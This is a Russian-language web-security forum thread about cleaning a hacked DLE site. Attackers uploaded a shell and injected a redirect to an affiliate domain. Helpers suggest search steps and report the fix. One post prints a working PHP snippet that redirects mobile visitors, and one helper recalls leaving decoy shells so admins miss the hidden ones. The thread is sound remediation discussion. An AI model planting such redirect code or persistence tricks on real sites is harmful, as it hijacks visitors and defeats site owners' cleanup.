Вернуться   SEO форум - оптимизация и продвижение сайтов > Web разработки > Безопасность

Важная информация
Безопасность - Помощь в обнаружении и удалении вредоносного кода с сайта. Устранение последствий взлома. Все о веб безопасности.

Ответ
 
Опции темы Оценить тему Опции просмотра
Старый 24.02.2012, 20:21   #1
 
Аватар для dimka119
 
Сообщений: 244
FR (активность): 10,650

Доп. информация
По умолчанию Автор темы Взломали ) залили шелл и вставили вредоносный код

Взломали ) залили шелл и вставили вредоносный код .
Шелл нашел , код который всунули найти не могу не как , посмотрите пожалуйста и помогите)

Сайт при заходи редиректит на http://googlefilee.a3aa.in/ как я понял код от http://loadpays.com всунули тока куда хз
Оффтоп:
http://foto-scena.ru/
dimka119 вне форума  
Ответить с цитированием Сказать Плохо за это бесполезное сообщение Быстрый ответ на это сообщение
Старый 24.02.2012, 20:23   #2
 
Аватар для cthulchu
 
Сообщений: 3,708
FR (активность): 121,165

Доп. информация
По умолчанию

.htaccess
и двиг обнови.
зы
часто школохекеры распостраняют нулёные версии с шеллами.
Оффтоп:
ззы
я всегда оставлял несколько шеллов на видных местах, чтобы админы быстрее расслаблялись и не трогали другие шеллы. раньше. когда это еще было прикольно.
cthulchu вне форума  
Ответить с цитированием Сказать Плохо за это бесполезное сообщение Быстрый ответ на это сообщение
Старый 24.02.2012, 20:29   #3
 
Аватар для dimka119
 
Сообщений: 244
FR (активность): 10,650

Доп. информация
По умолчанию Автор темы

Код:
DirectoryIndex index.php

RewriteEngine On

# Редиректы
RewriteRule ^page/(.*)$ index.php?cstart=$1 [L]

# Сам пост
RewriteRule ^([0-9]{4})/([0-9]{2})/([0-9]{2})/page,([0-9]+),([0-9]+),(.*).html(/?)+$ index.php?subaction=showfull&year=$1&month=$2&day=$3&news_page=$4&cstart=$5&news_name=$6 [L]
RewriteRule ^([0-9]{4})/([0-9]{2})/([0-9]{2})/page,([0-9]+),(.*).html(/?)+$ index.php?subaction=showfull&year=$1&month=$2&day=$3&news_page=$4&news_name=$5 [L]
RewriteRule ^([0-9]{4})/([0-9]{2})/([0-9]{2})/print:page,([0-9]+),(.*).html(/?)+$ engine/print.php?subaction=showfull&year=$1&month=$2&day=$3&news_page=$4&news_name=$5 [L]
RewriteRule ^([0-9]{4})/([0-9]{2})/([0-9]{2})/(.*).html(/?)+$ index.php?subaction=showfull&year=$1&month=$2&day=$3&news_name=$4 [L]

RewriteRule ^([^.]+)/page,([0-9]+),([0-9]+),([0-9]+)-(.*).html(/?)+$ index.php?newsid=$4&news_page=$2&cstart=$3 [L]
RewriteRule ^([^.]+)/page,([0-9]+),([0-9]+)-(.*).html(/?)+$ index.php?newsid=$3&news_page=$2 [L]
RewriteRule ^([^.]+)/print:page,([0-9]+),([0-9]+)-(.*).html(/?)+$ engine/print.php?news_page=$2&newsid=$3 [L]
RewriteRule ^([^.]+)/([0-9]+)-(.*).html(/?)+$ index.php?newsid=$2 [L]

RewriteRule ^page,([0-9]+),([0-9]+),([0-9]+)-(.*).html(/?)+$ index.php?newsid=$3&news_page=$1&cstart=$2 [L]
RewriteRule ^page,([0-9]+),([0-9]+)-(.*).html(/?)+$ index.php?newsid=$2&news_page=$1 [L]
RewriteRule ^print:page,([0-9]+),([0-9]+)-(.*).html(/?)+$ engine/print.php?news_page=$1&newsid=$2 [L]
RewriteRule ^([0-9]+)-(.*).html(/?)+$ index.php?newsid=$1 [L]

# За день
RewriteRule ^([0-9]{4})/([0-9]{2})/([0-9]{2})(/?)+$ index.php?year=$1&month=$2&day=$3 [L]
RewriteRule ^([0-9]{4})/([0-9]{2})/([0-9]{2})/page/([0-9]+)(/?)+$ index.php?year=$1&month=$2&day=$3&cstart=$4 [L]
# За весь месяц
RewriteRule ^([0-9]{4})/([0-9]{2})(/?)+$ index.php?year=$1&month=$2 [L]
RewriteRule ^([0-9]{4})/([0-9]{2})/page/([0-9]+)(/?)+$ index.php?year=$1&month=$2&cstart=$3 [L]
# Вывод за весь год
RewriteRule ^([0-9]{4})(/?)+$ index.php?year=$1 [L]
RewriteRule ^([0-9]{4})/page/([0-9]+)(/?)+$ index.php?year=$1&cstart=$2 [L]
# вывод отдельному тегу
RewriteRule ^tags/([^/]*)(/?)+$ index.php?do=tags&tag=$1 [L]
RewriteRule ^tags/([^/]*)/page/([0-9]+)(/?)+$ index.php?do=tags&tag=$1&cstart=$2 [L]
# вывод для отдельного юзера
RewriteRule ^user/([^/]*)/rss.xml$ engine/rss.php?subaction=allnews&user=$1 [L]
RewriteRule ^user/([^/]*)(/?)+$ index.php?subaction=userinfo&user=$1 [L]
RewriteRule ^user/([^/]*)/page/([0-9]+)(/?)+$ index.php?subaction=userinfo&user=$1&cstart=$2 [L]
RewriteRule ^user/([^/]*)/news(/?)+$ index.php?subaction=allnews&user=$1 [L]
RewriteRule ^user/([^/]*)/news/page/([0-9]+)(/?)+$ index.php?subaction=allnews&user=$1&cstart=$2 [L]
RewriteRule ^user/([^/]*)/news/rss.xml(/?)+$ engine/rss.php?subaction=allnews&user=$1 [L]
# вывод всех последних новостей
RewriteRule ^lastnews/(/?)+$ index.php?do=lastnews [L]
RewriteRule ^lastnews/page/([0-9]+)(/?)+$ index.php?do=lastnews&cstart=$1 [L]
# вывод в виде каталога
RewriteRule ^catalog/([^/]*)(/?)+$ index.php?catalog=$1 [L]
RewriteRule ^catalog/([^/]*)/page/([0-9]+)(/?)+$ index.php?catalog=$1&cstart=$2 [L]
# вывод непрочитанных статей
RewriteRule ^newposts(/?)+$ index.php?subaction=newposts [L]
RewriteRule ^newposts/page/([0-9]+)(/?)+$ index.php?subaction=newposts&cstart=$1 [L]
# Статистические страницы
RewriteRule ^static/(.*).html(/?)+$ index.php?do=static&page=$1 [L]
# вывод избранных статей
RewriteRule ^favorites(/?)+$ index.php?do=favorites [L]
RewriteRule ^favorites/page/([0-9]+)(/?)+$ index.php?do=favorites&cstart=$1 [L]

RewriteRule ^rules.html$ index.php?do=rules [L]
RewriteRule ^statistics.html$ index.php?do=stats [L]
RewriteRule ^addnews.html$ index.php?do=addnews [L]
RewriteRule ^rss.xml$ engine/rss.php [L]
RewriteRule ^sitemap.xml$ uploads/sitemap.xml [L]

RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule ^([^.]+)/page/([0-9]+)(/?)+$ index.php?do=cat&category=$1&cstart=$2 [L]
RewriteRule ^([^.]+)/?$ index.php?do=cat&category=$1 [L]

RewriteCond %{REQUEST_FILENAME} !-f
RewriteRule ^([^<]+)/rss.xml$ engine/rss.php?do=cat&category=$1 [L]
RewriteRule ^page,([0-9]+),([^/]+).html$ index.php?do=static&page=$2&news_page=$1 [L]
RewriteRule ^print:([^/]+).html$ engine/print.php?do=static&page=$1 [L]

RewriteCond %{REQUEST_FILENAME} !-f
RewriteRule ^([^/]+).html$ index.php?do=static&page=$1 [L]
это .htaccess но вроде нету ничего
dimka119 вне форума  
Ответить с цитированием Сказать Плохо за это бесполезное сообщение Быстрый ответ на это сообщение
Старый 24.02.2012, 20:34   #4
 
Аватар для cthulchu
 
Сообщений: 3,708
FR (активность): 121,165

Доп. информация
По умолчанию

действительно, нету. что ж, значит, там js-редирект. посмотри index.php на предмет левого js-кода. скорее всего, он будет обфусцирован, или шифрован.
можешь сюда выложить свой index.php, только юзай тег для пхп-кода
[php]include brain.gif;
echo "о даааа";[/php]
cthulchu вне форума  
Ответить с цитированием Сказать Плохо за это бесполезное сообщение Быстрый ответ на это сообщение
Старый 24.02.2012, 20:37   #5
 
Аватар для dimka119
 
Сообщений: 244
FR (активность): 10,650

Доп. информация
По умолчанию Автор темы

удалил) так как не тут дело
dimka119 вне форума  
Ответить с цитированием Сказать Плохо за это бесполезное сообщение Быстрый ответ на это сообщение
Старый 24.02.2012, 20:48   #6
 
Аватар для cthulchu
 
Сообщений: 3,708
FR (активность): 121,165

Доп. информация
По умолчанию

забавно, в индексе пусто, значит, скорее всего, редирект где-то в инклудах. блин, придется ловить блохи, наверное.
теперь слушай внимательно:
тотал командером скачай всё содержимое фтп себе на локалхост, жмакни alt+f7, в нижнем поле поиска (поиск по содержимому) вбей "a3aa"
Если поиск ничего не даст, поищи "base64"
пока я изучу твой исходник.
ps
а, вообще, - дай мне доступ к фтп, я сам посмотрю, как закончу тренироваться.
//upd
я получил доступ. мы с коллегой полечили сайтик. трудно было. дле - гадость, не советую его юзать, а то потом вместо 15 минут полтора часа искать будете заразу.
Фишка была в том, что в исходник была добавлена строчка. добавлена через систему баннеров. внешний js редиректил на партнерку.
под хайдом находится ссылка на эту гадость и ее исходник:
Скрытый (как скрывать?) текст. Только для группы: "Пользователь":
Ваша группа не позволяет просмотреть скрытую информацию.

слава богу, никаких сплойтов небыло.
зы
уже в который раз натыкаюсь на шелл Орба. на сей раз, обфусцирванный. Хотел бы я посмотреть Орбу в глаза. Создателю столь популярных костылей. ради пиара школофорума.
СТЕПАН: сообщение полезно
cthulchu вне форума  
Ответить с цитированием Сказать Плохо за это бесполезное сообщение Быстрый ответ на это сообщение
"Спасибо" от:
dimka119 (25.02.2012), СТЕПАН (24.06.2012)
Старый 01.10.2012, 20:44   #7
 
Аватар для nikboy
 
Сообщений: 1
FR (активность): 5

Доп. информация
По умолчанию

А я вот от этого кода каждую неделю замучился чистить. Тоже DLE

Код:
Код:
<?php
if(preg_match('/(android|midp|j2me|symbian|series 60|symbos|windows   mobile|windows   ce|ppc|smartphone|blackberry|mtk)/i',$_SERVER['HTTP_USER_AGENT'])   && $_COOKIE["hit"] != 1)
{
@setcookie("hit", 1, time()+60*60*24*7);
@header("Location: тут ссылка/?mob");

}
?>
nikboy вне форума  
Ответить с цитированием Сказать Плохо за это бесполезное сообщение Быстрый ответ на это сообщение
Старый 01.10.2012, 21:23   #8
 
Аватар для Ебозаврик
 
Сообщений: 272
FR (активность): 9,486

Доп. информация
По умолчанию

Хацкеры нищеброды. На файл партнерку шелл сливают без связки.


Не веду никакой деятельности, контактов ICQ, Skype и т.д. не имею. С Уважением.
Ебозаврик вне форума  
Ответить с цитированием Сказать Плохо за это бесполезное сообщение Быстрый ответ на это сообщение
Старый 01.10.2012, 21:29   #9
 
Аватар для cthulchu
 
Сообщений: 3,708
FR (активность): 121,165

Доп. информация
По умолчанию

на связку надо уметь лить. ну и иметь связи.
nikboy, уязвимость надо почистить и шеллы убрать, а не код менять. могут, действительно, набраться ума и слить траф на связку, что быстро убьет позиции сайта.
cthulchu вне форума  
Ответить с цитированием Сказать Плохо за это бесполезное сообщение Быстрый ответ на это сообщение
Старый 01.10.2012, 23:25   #10
 
Аватар для Rxp
 
Сообщений: 5
FR (активность): 48

Доп. информация
По умолчанию

Цитата:
Сообщение от Луна Посмотреть сообщение
Хацкеры нищеброды. На файл партнерку шелл сливают без связки.
Если необходимо проверить сайт на вирусы и другие вредоносные скрипты стучите (ася в профиле) проверим и удалим + дадим рекомендации!

Так же проверяем хост на уязвимость и рутики, вот наши темы с отзывами:

http://forum.searchengines.ru/showthread.php?t=635696
http://forum.sape.ru/showthread.php?t=79363
http://www.maultalk.com/topic113834s0.html


Почистим сайт от вирусов, шеллов и других вредоносных скриптов. Проверяем сервер на уязвимость!
Rxp вне форума  
Ответить с цитированием Сказать Плохо за это бесполезное сообщение Быстрый ответ на это сообщение
Старый 02.10.2012, 15:05   #11
 
Аватар для Alexandr3
 
Сообщений: 2
FR (активность): 114

Доп. информация
По умолчанию

Что требуется для проверки скрипт, доступ?
Alexandr3 вне форума  
Ответить с цитированием Сказать Плохо за это бесполезное сообщение Быстрый ответ на это сообщение
Старый 02.10.2012, 22:42   #12
 
Аватар для revis
 
Сообщений: 1
FR (активность): 42

Доп. информация
По умолчанию

Проверьте бесплатным AI-Bolit: хттп://revisium.com/ai/ - все, что будет красным в отчете смотрите внимательно, скорее всего все будет вредоносным кодом. Все, что оранжевым - подозрение на вредоносный код, но скорее всего 90% из оранжевого будет ложное срабатывание. Что не понятно - спрашивайте.
revis вне форума  
Ответить с цитированием Сказать Плохо за это бесполезное сообщение Быстрый ответ на это сообщение
Старый 24.06.2013, 20:18   #13
 
Аватар для inventor1975
 
Сообщений: 1
FR (активность): 5

Доп. информация
По умолчанию

А потом поставьте сайт на мониторинг find-xss.net/monitoring/
Если и зальют снова то сможете быстро удалить.
inventor1975 вне форума  
Ответить с цитированием Сказать Плохо за это бесполезное сообщение Быстрый ответ на это сообщение
Старый 08.09.2013, 21:01   #14
 
Аватар для mh-seo
 
Сообщений: 55
FR (активность): 7,084

Доп. информация
По умолчанию

Цитата:
Сообщение от inventor1975 Посмотреть сообщение
А потом поставьте сайт на мониторинг find-xss.net/monitoring/
Если и зальют снова то сможете быстро удалить.
можно еще воспользоватся таким скриптом, http://mh-proxy.ru/blog/index.php?mod=read&id=26

он както по проще в настройках будет, да и толку больше, так как find-xss.net/monitoring шелл та найдёт, но хакер успеет нагадить на сайте.
mh-seo вне форума  
Ответить с цитированием Сказать Плохо за это бесполезное сообщение Быстрый ответ на это сообщение
Ответ

Быстрый ответ
Ваше имя пользователя: Регистрация. Для входа нажмите здесь
Случайный вопрос

Сообщение:
Опции
Внимание!
Этой теме более 3308 дней. Вы можете оставить сообщение здесь. Но, обращаем внимание. Возможно, рациональней создать новую тему (найти свежее обсуждение)?


Опции темы
Опции просмотра Оценка этой теме
Оценка этой теме:

Ваши права в разделе
Вы не можете создавать новые темы
Вы можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Сбились настройки хостинга или dle взломали? webmas Безопасность 2 19.03.2013 15:08
взломали сайт?? psychomonkey Безопасность 1 03.01.2012 16:09
Взломали мыло ancorid Безопасность 3 29.09.2011 08:37
Взломали почту, подскажите решение Antoxa-sm Безопасность 14 13.09.2011 16:53
вредоносный код Анатолька Безопасность 7 06.07.2010 20:06

Текущее время: 20:02. Часовой пояс GMT +3.